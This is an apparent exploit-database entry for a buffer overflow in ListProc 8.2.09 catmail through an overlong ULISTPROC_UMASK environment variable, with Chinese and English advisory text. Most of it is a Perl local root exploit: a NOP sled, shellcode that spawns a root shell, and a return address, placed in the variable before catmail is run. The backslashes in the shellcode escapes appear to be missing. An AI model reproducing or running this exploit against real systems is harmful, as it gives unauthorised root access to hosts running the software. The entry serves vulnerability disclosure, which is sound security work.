https://www.exploit-db.com/exploits/22573
https://www.securityfocus.com/bid/82820
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-069

ListProc8.2.09及其早期版本中的catmail存在缓冲区溢出漏洞。远程攻击者可以通过超长ULISTPROC_UMASK值执行任意代码。

source: http://www.securityfocus.com/bid/7533/info

ListProc catmail has been reported prone to a buffer overflow vulnerability when handling a ULISTPROC_UMASK environment variable of excessive length.

The issue is likely due to a lack of sufficient bounds checking performed when copying the contents of the ULISTPROC_UMASK environment variable into an internal memory buffer.

Ultimately an attacker may exploit this vulnerability to execute arbitrary operation codes. Code execution would occur in the context of the ListProc catmail application, typically root.

It should be noted that while his vulnerability has been reported to affect ListProc 8.2.09, other versions might also be affected. 

#!/usr/bin/perl -w
# DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
# as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
# offset, retaddr and shellcode is for my FreeBSD 4.8-RELEASE, YMMV
# shellcode by eSDee, hello there eSDee
# dont forget to edit the path to the catmail binary
# this yields uid(0) if listproc is installed by root, otherwise something else

$len = 16534;
$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. � eye)
$nop = "x90";                                        
$shellcode =    "x31xc0x50x50xb0x17xcdx80x31xc0x50x68".
                "x2fx2fx73x68x68x2fx62x69x6ex89xe3x50".
                "x54x53x50xb0x3bxcdx80x31xc0xb0x01xcdx80";
                                                      
for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
    $buffer .= $nop;                                  
}                                                     
$buffer .= $shellcode;                                
$buffer .= $ret x 2;                                  
local($ENV{'ULISTPROC_UMASK'}) = $buffer;             
system("catmail");

CREN ListProc 8.2.9

来源:BUGTRAQ
名称:20030508SRT2003-05-08-1137-ListProcmailinglistULISTPROC_UMASKoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105241224228693&w;=2